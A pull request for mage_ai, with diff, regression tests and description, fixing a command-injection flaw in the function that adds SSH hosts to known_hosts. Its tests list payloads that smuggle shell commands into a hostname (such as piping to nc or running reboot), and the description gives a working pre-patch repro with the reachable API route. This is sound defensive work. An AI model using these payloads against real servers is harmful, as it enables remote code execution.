### PR TITLE
git: harden add_host_to_known_hosts against shell metacharacters (refs #4924)

### DIFF
--- a/mage_ai/data_preparation/git/utils.py
+++ b/mage_ai/data_preparation/git/utils.py
@@ -1,6 +1,7 @@
 import asyncio
 import base64
 import os
+import re
 import subprocess
 from typing import Callable
 from urllib.parse import urlparse, urlsplit, urlunsplit
@@ -24,6 +25,20 @@ from mage_ai.settings.keys import (
     GIT_SSH_PUBLIC_KEY,
     GITLAB_HOST,
 )
+
+
+# Strict RFC-952/1123 hostname (with optional :port). Refuses shell metacharacters.
+_SAFE_HOSTNAME_RE = re.compile(
+    r'^[A-Za-z0-9](?:[A-Za-z0-9\-]*[A-Za-z0-9])?'
+    r'(?:\.[A-Za-z0-9](?:[A-Za-z0-9\-]*[A-Za-z0-9])?)*'
+    r'(?::[0-9]{1,5})?$'
+)
+
+
+def _validate_hostname(hostname: str) -> str:
+    if not hostname or not _SAFE_HOSTNAME_RE.match(hostname):
+        raise ValueError(f'Refusing unsafe SSH hostname: {hostname!r}')
+    return hostname
 
 
 def get_auth_type_from_url(remote_url: str) -> AuthType:
@@ -123,6 +138,9 @@ def create_ssh_keys(
         # Codecommit requires additional configuration for SSH connection
         config_file = os.path.join(DEFAULT_SSH_KEY_DIRECTORY, 'config')
         if hostname and hostname.startswith('git-codecommit'):
+            # Defense in depth: reject hostnames containing shell/newline
+            # metacharacters before interpolating them into the SSH config file.
+            _validate_hostname(hostname)
             if not os.path.exists(config_file) or overwrite:
                 config = f'''Host {hostname}
 User {git_config.username}
@@ -139,17 +157,34 @@ def run_command(command: str) -> None:
     proc.wait()
 
 
-def add_host_to_known_hosts(remote_repo_link: str):
+def add_host_to_known_hosts(remote_repo_link: str) -> bool:
     url = remote_repo_link
     if url and not url.startswith('ssh://'):
         url = f'ssh://{url}'
 
     hostname = urlparse(url).hostname
-    if hostname:
-        cmd = f'ssh-keyscan -t rsa {hostname} >> {DEFAULT_KNOWN_HOSTS_FILE}'
-        run_command(cmd)
-        return True
-    return False
+    if not hostname:
+        return False
+
+    # Reject hostnames containing shell metacharacters (`;`, `|`, `` ` ``, `$()`,
+    # `&&`, whitespace, newlines, etc.) before they reach any subprocess call.
+    _validate_hostname(hostname)
+
+    known_hosts_dir = os.path.dirname(DEFAULT_KNOWN_HOSTS_FILE)
+    if known_hosts_dir:
+        os.makedirs(known_hosts_dir, exist_ok=True)
+
+    # Use list-form subprocess + Python-managed file handle: shell metacharacters
+    # in `hostname` cannot reach a shell. Defense in depth on top of the regex
+    # check above.
+    with open(DEFAULT_KNOWN_HOSTS_FILE, 'ab') as known_hosts:
+        subprocess.run(
+            ['ssh-keyscan', '-t', 'rsa', hostname],
+            stdout=known_hosts,
+            stderr=subprocess.DEVNULL,
+            check=False,
+        )
+    return True
 
 
 def get_access_token(git_config, repo_path: str) -> str:

--- a/mage_ai/tests/data_preparation/git/test_add_host_to_known_hosts_security.py
+++ b/mage_ai/tests/data_preparation/git/test_add_host_to_known_hosts_security.py
@@ -1,0 +1,50 @@
+import unittest
+from unittest.mock import patch
+
+from mage_ai.data_preparation.git import utils
+
+
+class AddHostToKnownHostsSecurityTest(unittest.TestCase):
+    def setUp(self):
+        self.payloads = [
+            'ssh://h;touch /tmp/should_not_exist',
+            'ssh://h$(id)',
+            'ssh://h`id`',
+            'ssh://h|nc 1.1.1.1 80',
+            'ssh://h&&touch /tmp/x',
+            'ssh://;reboot',
+        ]
+
+    def test_shell_metacharacters_rejected(self):
+        for payload in self.payloads:
+            with self.subTest(payload=payload), \
+                 patch('subprocess.run') as mock_run, \
+                 self.assertRaises(ValueError):
+                utils.add_host_to_known_hosts(payload)
+            # ssh-keyscan should never be invoked with a poisoned hostname
+            mock_run.assert_not_called()
+
+    def test_safe_hostname_accepted(self):
+        with patch('subprocess.run') as mock_run, \
+             patch('builtins.open'), \
+             patch('os.makedirs'):
+            result = utils.add_host_to_known_hosts('ssh://git.example.com:22')
+            self.assertTrue(result)
+            args, kwargs = mock_run.call_args
+            # `subprocess.run` is invoked with a list (no shell), and the
+            # hostname is passed as a single argv element. `urlparse` strips
+            # the port into `.port`, so we expect just the host here.
+            self.assertEqual(args[0][0:3], ['ssh-keyscan', '-t', 'rsa'])
+            self.assertEqual(args[0][3], 'git.example.com')
+            self.assertNotIn('shell', kwargs)  # never run via /bin/sh
+
+    def test_no_scheme_added_automatically(self):
+        with patch('subprocess.run') as mock_run, \
+             patch('builtins.open'), \
+             patch('os.makedirs'):
+            result = utils.add_host_to_known_hosts('git.example.com')
+            self.assertTrue(result)
+
+
+if __name__ == '__main__':
+    unittest.main()


### PR DESCRIPTION
## Summary

Fixes an OS command-injection vulnerability in `mage_ai/data_preparation/git/utils.add_host_to_known_hosts`.

Originally reported by @aydinnyunus in #4924 (2024-04-16) — that issue has remained open for 26 months. This PR provides a verified reproduction against current `master` (ae3e228), a minimal fix, and a regression test. Credit for the original discovery belongs to @aydinnyunus.

## Repro (pre-patch)

```python
from mage_ai.data_preparation.git.utils import add_host_to_known_hosts
add_host_to_known_hosts("ssh://h;touch /tmp/mage_pwn")
# -> /bin/sh -c 'ssh-keyscan -t rsa h;touch /tmp/mage_pwn >> ~/.ssh/known_hosts'
# -> /tmp/mage_pwn is created as the Mage server process owner
```

Reachable in the standard product flow via `POST /api/syncs` (`SyncResource.create()` -> `GitSync.__init__` with `setup_repo=True` -> `Git.__setup_repo` -> `add_host_to_known_hosts`).

Notes on auth: `SyncPolicy` requires Editor, but `has_at_least_editor_role` in `mage_ai/api/utils.py` returns True for all callers when `REQUIRE_USER_AUTHENTICATION` is unset — the supported self-host default per `docs/guides/best-practices.mdx`.

## Fix

1. Strict RFC-952/1123 hostname (+ optional `:port`) regex check. Shell metacharacters → `ValueError`.
2. `subprocess.run([...], shell=False, stdout=known_hosts_fh)` — no shell, no string interpolation. The `>>` was replaced by a Python-managed file append.
3. Defense-in-depth: same `_validate_hostname` guard added to `create_ssh_keys` (same parsing helper, distinct sink).

## Tests

Added `mage_ai/tests/data_preparation/git/test_add_host_to_known_hosts_security.py`:

- Six shell-metacharacter payloads (`;`, `$()`, backticks, `|`, `&&`, no-host) → `ValueError`, `subprocess.run` never called.
- Normal `git.example.com:22` → accepted, passed as single argv element.

Closes #4924.